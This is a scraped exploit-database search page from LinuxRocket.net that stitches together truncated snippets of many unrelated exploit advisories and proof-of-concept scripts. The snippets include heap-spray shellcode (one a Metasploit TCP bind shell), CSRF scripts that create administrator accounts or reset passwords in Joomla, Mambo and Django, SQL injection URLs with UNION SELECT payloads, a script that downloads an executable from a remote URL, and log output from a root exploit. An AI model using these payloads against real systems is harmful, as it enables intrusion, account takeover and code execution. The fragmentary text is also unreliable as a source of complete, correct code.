New User, Welcome!     Login

Next Page >>

var

Reliable Windows 7 Exploitation: A Case Study

<script type="text/javascript">
<!--

//originally, windows 7 compatible calc.exe shellcode from SkyLined
var scode = "removed";

var newstack,newstackaddr;
var fakeobj;

var spray,spray2,selarray,readindex,readaddr,optarryaddr;

KwsPHP (Upload) Remote Code Execution Exploit

 * 
 */

class phpsploit
{
        var $proxyhost;
        var $proxyport;
        var $host;
        var $path;
        var $port;
        var $method;

Firefox 3.6.3 (latest) <= memory exhaustion crash vulnerabilities

Title: Firefox 3.6.3 (latest) <= memory exhaustion crash vulnerabilities

0x01. Description:
Memory exhaustion of Firefox 3.6.3 (latest) <= makes firefox can't make texts into body element and then it crashed. 
( raise exception using PoC #1, lower memory area read access violation using PoC #2 )
Ofcourse an variation PoC made NULL Pointer deref so may also could be code execution ( 0.1 % ). :-)

URL: http://www.x90c.org/advisories/firefox_3.6.3_crash_advisory.txt

Vendor Status: unpatched. ( to now... doesn't exists any reliable exploit so i disclosed to bugtraq firstly )


HP notebooks remote code execution vulnerability (multiple series)

The default AX control installation path is 
C:\Program Files\Hewlett-Packard\HP Info Center

The control contains three potentially insecure methods:

VARIANT GetRegValue(String sHKey, String sectionName, String keyName);
void SetRegValue(String sHKey, String sSectionName, String sKeyName, String sValue);
void LaunchApp(String appPath, String params, int cmdShow);

The first and second method are used to access remote registry for read and write by the HP 
update and configuration software. To access chosen registry key one must split its path 

BoutikOne Multiples SQL Injection Vulnerability

RELEASE DATE : 13.03.2011
by Alz <cdx[dot]security[at]gmail[dot]com

[-] Google Dork: "Powered by BoutikOne"

[-> categorie.php] Var <path> :
http://[target]/categories.php?path=[sqli]

[-> list.php] Var <path> :
http://[target]/list.php?path=[sqli]


Multiple Vulnerabilities in OpenClassifieds 1.7.0.3

 "This web application [OpenClassifieds] is developed to be fast, light, secure and SEO friendly."
 Usually when I see that an application claims to be secure,  they really don't know what the fuck they
 are doing.  OpenClassifieds' Security model is deeply flawed and as a result there are MANY
 vulnerabilities in this code base which allowed me to string a few cool ones together to make an
 interesting exploit.    OpenClassifieds is sanitizing everything on input using cG() and cP(),  these
 functions are used to perform a mysql_real_escape_string()  on all GET and POST variables.  Most
 servers aren't using an exotic character set so from a security stand point this is exactly identical to
 magic_quotes_gpc.  So I dusted off my usual magic_quotes_gpc auditing tricks,  look for
 stripslashes(),base64decode(),urldecode(),html_entity_decode() lack of quote marks around variables
 in a query,  ect...  Sanitation must ALWAYS be done at the time of use, parametrized queries are a
 good example of this.   Its impossible to account for all the ways a variable can be mangled once it

Arbitrary Command Inclusion

Flash versione that you have to export in a swf and import in a iframe

exploit.swf


    var action:String = "saveprofile";
    var user:String = "nome_user_che_modifichiamo";
    var regpass:String = "nuova_pass";
    var anag:String = "nome";
    var homep:String = "sito_utente";
    var prof:String = "professione";

Apple Safari <= Tag (heap spray) Remote Buffer Overflow Exploit (osX)

// osX/x86/vforkshell_bind_tcp - 152 bytes
// http://www.metasploit.com
// AppendExit=false, PrependSetresuid=false,
// PrependSetuid=false, LPORT=4444, RHOST=,
// PrependSetreuid=false
var shellcode =
unescape("%uc031%u5099%u5040%u5040%ub052%ucd61%u0f80%u7e82%u0000%u8900%u52c
6%u5252%u0068%u1102%u895c%u6ae3%u5310%u5256%u68b0%u80cd%u6772%u5652%ub052%u
cd6a%u7280%u525e%u5652%ub052%ucd1e%u7280%u8954%u31c7%u83db%u01eb%u5343%u535
7%u5ab0%u80cd%u4372%ufb83%u7503%u31f1%u50c0%u5050%ub050%ucd3b%u9080%u3c90%u
752d%ub009%ucd42%u8380%u00fa%u1774%uc031%u6850%u2f2f%u6873%u2f68%u6962%u896

Joomla 1.0.13 CSRF

<script type="text/javascript">

window.onload = function() {

    var url = "http://joomlasite.com/joomla/administrator/index2.php";


    var gid = 25;

    var user = 'custom_username';

Mambo 4.6.3 Path Disclosure, XSS , XSRF, DOS

Set desiered user, pass, email and victims url then upload the script  
somewhere on the web
*/

window.onload = function() {
var url   = 'http://localhost/MamboV4.6.2/administrator/index2.php';
var gid   = 25;
var user  = 'amnpardaz';
var pass  = 'amnpardaz';
var email = 'amnpardaz@none.com';
var param = {

پيش گزيده Website Design Chat Software Remote Cross-Site Scripting

NOT RECOMENDED: Byt you can also just upload a "deface page", something like:


[code]
var title = "Aria-Security.Net";
var bgcolor = "#HEX";
var image_url = "http://ariahosting.ir/index.html";
var text = "The-0utl4w";
var font_color = "#HEX";


sBlog 0.7.3 Beta Cross Site Request Forgery

- Greetz  : xiam ;)  Visit: xiam.be
-->

<script type="text/javascript">
window.onload = function() {
   var url = "http://[URL]/blocks_edit_do.php";

   var bid = [block id];
   var topic = [name block];
   var content = [cookie stealer];


Safari browser port blocking bypassed by integer overflow

The parent frame is gonna look something like this:

<iframe src="/" id="m9"></iframe>

<script>
var i = 0;
var emails;

var xhr = new XMLHttpRequest();
var url = "emails.php"
xhr.open("GET", url, true);

[DSECRG-09-035] Chance-i DiViS DVR ActiveX - Heap Overflow

    <PARAM NAME="_StockProps" VALUE="0">
    <PARAM NAME="Split" VALUE="4">
    </OBJECT>

    //server address
    var g_sAddress = location.hostname;
    var g_sId = "";
    var g_sPwd = "";
    var g_bLogin = false;
    var g_nMaxCamera = 16;


CORE-2008-0624: Anzio Web Print Object Buffer Overflow

~  <param name="preview" value="0">
~  <param name="faxnum" value>
~  </OBJECT>

<script>
~  var shellcode =
unescape("%u0de8%u0000%u6b00%u7265%u656e%u336c%u2e32%u6c64%u006c%u15ff%u108c%u0040%uf08b%u08e8%u0000%u5700%u6e69%u7845%u6365%u5600%u15ff%u1030%u0040%uec81%u0400%u0000%u016a%u09e8%u0000%u6300%u6c61%u2e63%u7865%u0065%ud0ff%u0ce8%u0000%u4500%u6978%u5074%u6f72%u6563%u7373%u5600%u15ff%u1030%u0040%u006a%ud0ff");

~  var spraySlide = unescape("%u9090%u9090");
~  var heapSprayToAddress = 0x0c0c0c0c;


NETGEAR Exposure of Sensitive Information - Security Advisory - SOS-12-005

<TITLE> 401 Authorization</TITLE>
<META http-equiv=content-type content='text/html; charset=UTF-8'>
<script>
function loadvalue()
{
        var enable_recovery="1";
        var enter_sn_again="0";
  var last_error_sn="2T82195D0093D";
        if( enable_recovery == "1" )

Viewing the source code of the recovery questions page allows an 

Internet Explorer 7.0 0day Vulnerability

<script language="javascript">
if(navigator.userAgent.toLowerCase().indexOf("msie 7")==-1)location.replace("about:blank");

function sleep(milliseconds)
{
var start=new Date().getTime();

for(var i=0;i<1e7;i++)
{if((new Date().getTime()-start)>milliseconds)
{break}
}

Django 0.96 (stable) Admin Panel CSRF

Proof of concept
================
<script type="text/javascript">
window.onload = function() {
    var url = "http://127.0.0.1:8000/admin/auth/user/1/password/";

    var pass = "funky";

    var param = {
        password1: pass,

PHP "multipart/form-data" denial of service

The console is continuously displaying kernel error messages like:
swap_pager_getswapspace(2): failed
swap_pager_getswapspace(16): failed
swap_pager_getswapspace(3): failed
...
pid 61248 (httpd), uid 80 inumber 5 on /var: out of inodes
pid 61251 (httpd), uid 80 inumber 5 on /var: out of inodes
pid 61146 (httpd), uid 80 inumber 5 on /var: out of inodes
pid 61103 (httpd), uid 80 inumber 5 on /var: out of inodes
pid 61103 (httpd), uid 80 inumber 5 on /var: out of inodes
pid 61063 (httpd), uid 80 inumber 5 on /var: out of inodes

VHCS <= 2.4.7.1 (vhcs2_daemon) Remote Root Exploit

#  + Using SQL user id 17
#  + Host thegoodone.com is a valid user
#  + Logged in (thegoodone.com - Client)
#  / Trying to load files via local_infile
#  + Ok: /etc/vhcs2/vhcs2.conf
#  + Ok: /var/www/vhcs2/gui/include/vhcs2-db-keys.php
#  + Now you can execute commands as root =]
#  + root@thegoodone.com: id
# 
# uid=0(root) gid=0(root)
#

New bypass shell for linux

.firstalt {BACKGROUND-COLOR: "#000000"}
.secondalt {BACKGROUND-COLOR: "#000000"}
</style>
<SCRIPT language=JavaScript>
function CheckAll(form) {
        for (var i=0;i<form.elements.length;i++) {
                var e = form.elements[i];
                if (e.name != 'chkall')
                e.checked = form.chkall.checked;
    }
}

(GET var 'member') BLIND SQL INJECTION EXPLOIT --FAMILY CONNECTIONS <= v1.9 -->

#!/usr/bin/perl
#--------------------------------------------------------------------------------
#(GET var 'member') BLIND SQL INJECTION EXPLOIT --FAMILY CONNECTIONS <= v1.9 -->
#--------------------------------------------------------------------------------
#
#CMS INFORMATION:
#
#-->WEB: http://www.familycms.com/index.php
#-->DOWNLOAD: http://www.familycms.com/download.php
#-->DEMO: http://www.familycms.com/demo/index.php

[ISecAuditors Security Advisories] Joomla! < 1.5.12 Multiple XSS vulnerabilities in HTTP Headers

III. DESCRIPTION
-------------------------
Joomla! fails to sanitized user supplied input. An attacker can inject
JavaScript or DHTML code that will be executed in the context of
targeted user browser, allowing him to steal cookies. HTTP headers are
not properly parsed, concretly the HTTP_REFERER variable.

Snippet of vulnerable code:

Line 225 of file components/com_content/views/article/tmpl/form.php is
vunerable.

Adobe Flex 3.3 SDK DOM-Based XSS

2. Technical Details
==================================================

File: index.template.html

1) Data enters via URL parameters through the window.location javascript object, is then stored into MMredirectURL variable, and passed to the AC_FL_RunContent() function.

Line 59:
.snip..
var MMredirectURL = window.location;
.snip..

[InterN0T] LiveZilla - XSS Vulnerability

-:: The Advisory ::-
The following files would together be vulnerable to Cross Site Scripting.

1. livezilla/templates/map.tpl (lines 18-20)
var default_lat = <!--dlat-->;
var default_lng = <!--dlng-->;
var default_zom = <!--dzom-->;

2. livezilla/map.php (lines 15-28)
if(isset($_GET["lat"]))

Apple iPhone 1.1.3 remote DoS exploit

    <html><body><script>

    function Demo() {

        var shellcode;
        var addr;
        var fill;

        alert('attempting a crash!');
        shellcode = unescape('%u0c0c');

Re: New Zeroday published

___ BEGIN ___

<html>
<SCRIPT language="javascript">
// This is new technique I invent call 'heap fill attack'
var str0ke = 0x0d0d0d0d;
var sucks = unescape( // Launch the system calculator 100 times 
because what else?
                      // This code currently not work on 
Solaris/Sparc
        

MULTIPLE SQL INJECTION VULNERABILITIES --Flash Quiz Beta 2-->

-------------------
PROOFS OF CONCEPT:
-------------------


[++] GET var --> 'quiz'

[++] File vuln --> 'num_questions.php'


~~~~~> http://[HOST]/[PATH]/num_questions.php?quiz=-1+UNION+ALL+SELECT+concat(user(),0x3A3A3A,version())/*

CORE-2009-0908: Autodesk SoftImage Scene TOC Arbitrary Command Execution

      <PostLoadScript>
      <Language>JScript</Language>
      <Function></Function>
      <Script_Content>
    <![cdata[
var s=new ActiveXObject('WScript.Shell');
var o=new ActiveXObject('ADODB.Stream');
var e=s.Environment('Process');
var u='http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe';
var b=e.Item('TEMP')+'agent.exe';
var x=new ActiveXObject('Microsoft.XMLHTTP');

Re: MS Internet Explorer 7 Denial Of Service Exploit

>  <br>
>  <center><img src="http://img81.imageshack.us/img81/8881/wallpaperxl0.jpg"></center>
>  <br>
>  <html>
>  <script>
>  var x=String.fromCharCode(550);
>  var x2="";
>  var x3="";
>  for(i=0;i<1549;i++)
>  {x2=x2+x;}
>  for(i=0;i<1549;i++)

Next Page>>

Copyright © 1995-2012 LinuxRocket.net. All rights reserved.

Nearly all of LinuxRocket's features are free. Be kind and donate to the cause!